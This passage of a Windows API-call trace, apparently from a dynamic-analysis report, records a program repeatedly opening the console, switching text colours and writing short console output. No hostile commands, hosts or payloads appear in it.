	[0043.730] CloseHandle (hObject=0x2f) returned 1
	[0043.730] GetLastError () returned 0xcb
	[0043.733] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0043.733] GetLastError () returned 0xcb
	[0043.733] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.733] GetLastError () returned 0xcb
	[0043.733] GetConsoleOutputCP () returned 0x1b5
	[0043.733] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.733] GetLastError () returned 0xcb
	[0043.737] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33
	[0043.739] GetLastError () returned 0xcb
	[0043.739] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.739] GetLastError () returned 0xcb
	[0043.741] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37
	[0043.742] GetLastError () returned 0xcb
	[0043.742] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.742] GetLastError () returned 0xcb
	[0043.745] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0043.745] GetLastError () returned 0xcb
	[0043.745] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.745] GetLastError () returned 0xcb
	[0043.745] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
	[0043.746] GetLastError () returned 0xcb
	[0043.746] CloseHandle (hObject=0x3b) returned 1
	[0043.752] GetLastError () returned 0xcb
	[0043.756] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0043.756] GetLastError () returned 0xcb
	[0043.756] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.756] GetLastError () returned 0xcb
	[0043.756] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
	[0043.756] GetLastError () returned 0xcb
	[0043.756] CloseHandle (hObject=0x3b) returned 1
	[0043.757] GetLastError () returned 0xcb
	[0043.760] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0043.760] GetLastError () returned 0xcb
	[0043.760] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0043.761] GetLastError () returned 0xcb
	[0043.761] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x22810f4*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x22810f4*, lpNumberOfCharsWritten=0x573ef4c*=0x3e) returned 1
	[0043.761] GetLastError () returned 0xcb
	[0043.761] CloseHandle (hObject=0x3b) returned 1
	[0043.761] GetLastError () returned 0xcb
	[0043.764] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0043.764] GetLastError () returned 0xcb
	[0043.764] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.764] GetLastError () returned 0xcb
	[0043.764] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
	[0043.764] GetLastError () returned 0xcb
	[0043.764] CloseHandle (hObject=0x3b) returned 1
	[0043.765] GetLastError () returned 0xcb
	[0043.768] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0043.768] GetLastError () returned 0xcb
	[0043.768] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.768] GetLastError () returned 0xcb
	[0043.768] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
	[0043.768] GetLastError () returned 0xcb
	[0043.769] CloseHandle (hObject=0x3b) returned 1
	[0043.769] GetLastError () returned 0xcb
	[0043.772] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0043.772] GetLastError () returned 0xcb
	[0043.772] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0043.773] GetLastError () returned 0xcb
	[0043.773] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0043.773] GetLastError () returned 0xcb
	[0043.773] CloseHandle (hObject=0x3b) returned 1
	[0043.773] GetLastError () returned 0xcb
	[0043.777] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0043.778] GetLastError () returned 0xcb
	[0043.778] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.778] GetLastError () returned 0xcb
	[0043.778] GetConsoleOutputCP () returned 0x1b5
	[0043.778] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.778] GetLastError () returned 0xcb
	[0043.781] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f
	[0043.781] GetLastError () returned 0xcb
	[0043.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.782] GetLastError () returned 0xcb
	[0043.785] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43
	[0043.786] GetLastError () returned 0xcb
	[0043.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.786] GetLastError () returned 0xcb
	[0043.789] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0043.790] GetLastError () returned 0xcb
	[0043.790] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.790] GetLastError () returned 0xcb
	[0043.790] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
	[0043.790] GetLastError () returned 0xcb
	[0043.791] CloseHandle (hObject=0x47) returned 1
	[0043.791] GetLastError () returned 0xcb
	[0043.794] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0043.794] GetLastError () returned 0xcb
	[0043.794] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.795] GetLastError () returned 0xcb
	[0043.795] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
	[0043.795] GetLastError () returned 0xcb
	[0043.795] CloseHandle (hObject=0x47) returned 1
	[0043.795] GetLastError () returned 0xcb
	[0043.798] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0043.799] GetLastError () returned 0xcb
	[0043.799] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0043.799] GetLastError () returned 0xcb
	[0043.799] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x228150c*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x228150c*, lpNumberOfCharsWritten=0x573ef4c*=0x11) returned 1
	[0043.799] GetLastError () returned 0xcb
	[0043.799] CloseHandle (hObject=0x47) returned 1
	[0043.800] GetLastError () returned 0xcb
	[0043.803] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0043.803] GetLastError () returned 0xcb
	[0043.803] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.804] GetLastError () returned 0xcb
	[0043.804] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
	[0043.804] GetLastError () returned 0xcb
	[0043.804] CloseHandle (hObject=0x47) returned 1
	[0043.804] GetLastError () returned 0xcb
	[0043.807] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0043.811] GetLastError () returned 0xcb
	[0043.811] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.811] GetLastError () returned 0xcb
	[0043.811] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
	[0043.811] GetLastError () returned 0xcb
	[0043.811] CloseHandle (hObject=0x47) returned 1
	[0043.812] GetLastError () returned 0xcb
	[0043.816] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0043.816] GetLastError () returned 0xcb
	[0043.816] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0043.816] GetLastError () returned 0xcb
	[0043.816] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0043.817] GetLastError () returned 0xcb
	[0043.817] CloseHandle (hObject=0x47) returned 1
	[0043.817] GetLastError () returned 0xcb
	[0043.821] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47
	[0043.822] GetLastError () returned 0xcb
	[0043.822] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.822] GetLastError () returned 0xcb
	[0043.822] GetConsoleOutputCP () returned 0x1b5
	[0043.822] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.822] GetLastError () returned 0xcb
	[0043.826] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b
	[0043.827] GetLastError () returned 0xcb
	[0043.827] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.827] GetLastError () returned 0xcb
	[0043.831] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f
	[0043.831] GetLastError () returned 0xcb
	[0043.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.831] GetLastError () returned 0xcb
	[0043.835] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0043.836] GetLastError () returned 0xcb
	[0043.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.836] GetLastError () returned 0xcb
	[0043.836] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
	[0043.836] GetLastError () returned 0xcb
	[0043.837] CloseHandle (hObject=0x53) returned 1
	[0043.837] GetLastError () returned 0xcb
	[0043.841] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0043.841] GetLastError () returned 0xcb
	[0043.841] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.842] GetLastError () returned 0xcb
	[0043.842] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
	[0043.842] GetLastError () returned 0xcb
	[0043.842] CloseHandle (hObject=0x53) returned 1
	[0043.842] GetLastError () returned 0xcb
	[0043.846] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0043.846] GetLastError () returned 0xcb
	[0043.846] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0043.847] GetLastError () returned 0xcb
	[0043.847] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2281884*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x2281884*, lpNumberOfCharsWritten=0x573ef4c*=0x39) returned 1
	[0043.847] GetLastError () returned 0xcb
	[0043.847] CloseHandle (hObject=0x53) returned 1
	[0043.848] GetLastError () returned 0xcb
	[0043.851] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0043.852] GetLastError () returned 0xcb
	[0043.852] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.853] GetLastError () returned 0xcb
	[0043.853] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
	[0043.853] GetLastError () returned 0xcb
	[0043.853] CloseHandle (hObject=0x53) returned 1
	[0043.854] GetLastError () returned 0xcb
	[0043.858] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0043.858] GetLastError () returned 0xcb
	[0043.858] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.858] GetLastError () returned 0xcb
	[0043.858] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
	[0043.858] GetLastError () returned 0xcb
	[0043.858] CloseHandle (hObject=0x53) returned 1
	[0043.859] GetLastError () returned 0xcb
	[0043.863] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0043.863] GetLastError () returned 0xcb
	[0043.863] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0043.863] GetLastError () returned 0xcb
	[0043.863] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0043.864] GetLastError () returned 0xcb
	[0043.864] CloseHandle (hObject=0x53) returned 1
	[0043.864] GetLastError () returned 0xcb
	[0043.868] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53
	[0043.869] GetLastError () returned 0xcb
	[0043.869] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.870] GetLastError () returned 0xcb
	[0043.870] GetConsoleOutputCP () returned 0x1b5
	[0043.870] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.870] GetLastError () returned 0xcb
	[0043.874] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57
	[0043.875] GetLastError () returned 0xcb
	[0043.875] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.875] GetLastError () returned 0xcb
	[0043.879] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b
	[0043.880] GetLastError () returned 0xcb
	[0043.880] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.880] GetLastError () returned 0xcb
	[0043.884] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0043.884] GetLastError () returned 0xcb
	[0043.884] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.884] GetLastError () returned 0xcb
	[0043.884] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
	[0043.885] GetLastError () returned 0xcb
	[0043.885] CloseHandle (hObject=0x5f) returned 1
	[0043.885] GetLastError () returned 0xcb
	[0043.889] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0043.889] GetLastError () returned 0xcb
	[0043.889] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.890] GetLastError () returned 0xcb
	[0043.890] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
	[0043.890] GetLastError () returned 0xcb
	[0043.890] CloseHandle (hObject=0x5f) returned 1
	[0043.890] GetLastError () returned 0xcb
	[0043.894] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0043.894] GetLastError () returned 0xcb
	[0043.894] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0043.894] GetLastError () returned 0xcb
	[0043.894] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2281d70*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x2281d70*, lpNumberOfCharsWritten=0x573ef4c*=0x4f) returned 1
	[0043.895] GetLastError () returned 0xcb
	[0043.895] CloseHandle (hObject=0x5f) returned 1
	[0043.895] GetLastError () returned 0xcb
	[0043.898] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0043.898] GetLastError () returned 0xcb
	[0043.898] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.899] GetLastError () returned 0xcb
	[0043.899] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
	[0043.899] GetLastError () returned 0xcb
	[0043.899] CloseHandle (hObject=0x5f) returned 1
	[0043.900] GetLastError () returned 0xcb
	[0043.903] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0043.903] GetLastError () returned 0xcb
	[0043.903] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.903] GetLastError () returned 0xcb
	[0043.903] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
	[0043.903] GetLastError () returned 0xcb
	[0043.903] CloseHandle (hObject=0x5f) returned 1
	[0043.904] GetLastError () returned 0xcb
	[0043.907] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0043.907] GetLastError () returned 0xcb
	[0043.907] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0043.907] GetLastError () returned 0xcb
	[0043.907] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0043.908] GetLastError () returned 0xcb
	[0043.908] CloseHandle (hObject=0x5f) returned 1
	[0043.908] GetLastError () returned 0xcb
	[0043.911] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f
	[0043.912] GetLastError () returned 0xcb
	[0043.912] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.912] GetLastError () returned 0xcb
	[0043.912] GetConsoleOutputCP () returned 0x1b5
	[0043.912] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.912] GetLastError () returned 0xcb
	[0043.915] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63
	[0043.916] GetLastError () returned 0xcb
	[0043.916] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.916] GetLastError () returned 0xcb
	[0043.919] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67
	[0043.919] GetLastError () returned 0xcb
	[0043.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.919] GetLastError () returned 0xcb
	[0043.922] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0043.922] GetLastError () returned 0xcb
	[0043.922] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.923] GetLastError () returned 0xcb
	[0043.923] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
	[0043.923] GetLastError () returned 0xcb
	[0043.923] CloseHandle (hObject=0x6b) returned 1
	[0043.923] GetLastError () returned 0xcb
